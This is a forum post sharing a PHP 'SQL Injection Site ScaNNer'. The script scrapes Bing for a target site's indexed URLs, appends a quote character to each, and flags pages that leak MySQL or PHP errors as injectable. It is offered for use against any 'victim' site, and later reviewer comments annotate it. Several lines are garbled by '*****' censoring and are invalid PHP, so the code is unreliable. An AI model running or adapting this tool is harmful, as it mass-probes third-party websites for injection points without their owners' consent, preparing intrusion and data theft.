Sql injection tarayıcı

HeRoTurk

PHP:
<?php
// Runtime setup: remove the execution time limit and request full error
// reporting. E_NOTICE is already part of E_ALL, so the OR adds nothing.
// The leading @ suppresses any warning raised by these two calls themselves.
@set_time_limit(0);
@error_reporting(E_ALL | E_NOTICE);

// Entry guard: with no (or a falsy) "target" query parameter, print the usage
// text plus an HTML form and stop. Reading $_GET["target"] directly raises an
// undefined-index notice when the parameter is absent.
// NOTE(review): the script is driven entirely by an unauthenticated GET
// parameter; when this file is found on a web server, any client that can
// reach it can trigger the outbound requests made further down.
if(!$_GET["target"]){

print_r("
================================================================================​​
USAGE : php sqli_site.php?target=www.victim.com 

================================================================================​​
<form action= method=GET>
target:<input type=text size=17 name=target><br/>
<input type=submit value=send>

");
// Nothing else runs without a target.
die();

}


/**
 * Report whether a fetched response body contains a database/PHP error phrase.
 *
 * $source is matched case-insensitively against a fixed list of MySQL and PHP
 * error strings; the outcome is echoed, nothing is returned.
 *
 * This is an error-leakage check only: a page that shows none of these strings
 * is reported as "Not Found". Applications that use parameterized queries and
 * do not display database errors to the client give it nothing to match.
 *
 * @param string $url    URL that was requested (used for display only).
 * @param mixed  $source Response body as returned by the caller's fetch.
 */
function check_url($url,$source){ // By Lagripe-Dz !?
// NOTE(review): "()" and "*" inside the alternatives are regex metacharacters
// here, not literals, and "Syntax error" / "Fatal error" are generic PHP
// messages, so a hit is a hint of verbose error output rather than proof.
// The pattern also carries invisible characters from the forum rendering.
if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row(​​)|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$source))  {
echo "[+] Found -> $url\n";
// NOTE(review): $url comes from scraped search results and is written into an
// unquoted href without htmlspecialchars(); a crafted link can inject markup
// into the operator's own browser session.
echo "<a href=".$url.">##</a><br/>";
}
else{ echo "[~] Not Found -> $url\n<br/>"; }
}

/**
 * Fetch $site with "%27" (a URL-encoded single quote) appended and hand the
 * response to check_url().
 *
 * What the probed server sees is a plain GET for an already-indexed URL whose
 * last parameter value ends in %27; that suffix is the observable to look for
 * in access logs.
 *
 * @param string $site URL taken from the collected search results.
 */
function check_sql_inj($site){
    // @ hides fetch failures: on error file_get_contents() returns false, which
    // is then passed on as the "source" and reported as "Not Found".
    // NOTE(review): $site is not validated (scheme, host) before being fetched;
    // whatever the scraped markup yields is requested from this host.
    $result = @file_get_contents("$site%27");
    check_url($site,$result);
    }

/**
 * Case-insensitive position lookup built from stristr() + strpos().
 *
 * stristr() yields the tail of $haystack starting at the first
 * case-insensitive match of $needle; the offset of that tail inside
 * $haystack is then returned.
 *
 * When $needle does not occur, stristr() returns false and that value is
 * passed to strpos() unchanged; the result in that case depends on the PHP
 * version (NOTE(review): confirm before relying on it).
 *
 * @param string $haystack Text to search in.
 * @param string $needle   Text to look for, compared case-insensitively.
 * @return int|false Offset of the match.
 */
function mystripos($haystack, $needle)
{
    $tail = stristr($haystack, $needle);

    return strpos($haystack, $tail);
}
    
/**
 * Reduce a URL to the text in front of its first "/".
 *
 * Every occurrence of "http://" and then of "www." is removed (anywhere in
 * the string, not only at the start; "https://" is not handled), and the
 * remainder is cut at the offset mystripos() reports for "/".
 *
 * Not called anywhere else in this listing.
 *
 * @param string $ent URL or host string.
 * @return string Leading part of the stripped string, up to the first "/".
 */
function sec($ent)
{
    // str_replace() applies array searches in order, one after the other.
    $stripped = str_replace(array("http://", "www."), "", $ent);
    $cut = mystripos($stripped, "/");

    return substr($stripped, 0, $cut);
}
// Link collection: page through search-engine results for the target and
// gather every result link into $allLinks.
// NOTE(review): the "*****" runs on the CURLOPT_URL, CURLOPT_REFERER and both
// preg_* lines are forum censoring artefacts; those four statements are not
// valid PHP as shown and their original text cannot be recovered from this page.
$npages = 50000;

  $npage = 1;
  $allLinks = array();
                // NOTE(review): $target is used as-is, with no validation or
                // urlencode(), both in the search URL below and in the final summary.
                $target = $_GET["target"];
        
  while($npage <= $npages) 
  { 
    $ch = curl_init();
                                
    curl_setopt($ch, CURLOPT_URL, 'http://www.bing.com/search?q=site%3A' . $target . *****+id=&first=***** . $npage);
    // Response headers are included in the returned text, the body is returned
    // rather than printed, and connecting is given at most 5 seconds.
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt($ch, CURLOPT_REFERER, 'http://www.bing.com/*****);
    // Fixed, dated browser User-Agent sent with every search request.
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');

    $result['EXE'] = curl_exec($ch);
    $result['ERR'] = curl_error($ch);

    curl_close($ch);

    if ( empty( $result['ERR'] ) )
    {
        // Pull href values out of result entries; the pattern is tied to one
        // specific result-page markup (div class "sb_tlst").
        preg_match_all(*****(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $result['EXE'], $findlink);
        for ($i = 0; $i < count($findlink[1]); $i++)
        array_push($allLinks,$findlink[1][$i]);


        // Results are paged in steps of 10; stop when the page holds no link
        // to the next offset.
        $npage = $npage + 10;
        if (preg_match(*****(first=***** . $npage . *****&amp)siU', $result['EXE'], $linksuiv) == 0) 
            break;               
    }
    else
        // Any cURL error ends the collection phase.
        break;
  }

// Copy the collected links into $allDmns (keys are discarded), then
// de-duplicate and sort them into $resultPages, the list that gets probed.
$allDmns = array();



    foreach ($allLinks as $kk => $vv){
    $allDmns[] = $vv;
    }
    // array_unique() keeps the original keys; sort() reindexes from 0, which
    // the index-based loop over $resultPages relies on.
    $resultPages = array_unique($allDmns);
    sort($resultPages) ;
    
// Banner text only.
print_r("
################################################################################​​#
                       SQL Injection Site ScaNNer v0.1
                           Recoded By JetLi HKer
                                VBSpiDers.com
                                Sudan 2011 (r)

################################################################################​​#
");

// Probe phase: one check_sql_inj() call, and therefore one outbound request,
// per unique collected link, issued sequentially with no delay between them.
for ($x = 0; $x < count($resultPages); $x++){
$h3h3 = $resultPages[$x];
check_sql_inj($h3h3);
}

// Summary line.
// NOTE(review): $target is the raw query parameter and is echoed without
// htmlspecialchars(), so the script reflects its own input into the page.
print_r("
================================================================================​​
            INFO / Site : ".$target." / Link scanned : ".count($resultPages)."
           
                         FINISHED
                             
================================================================================​​
");
?>
 
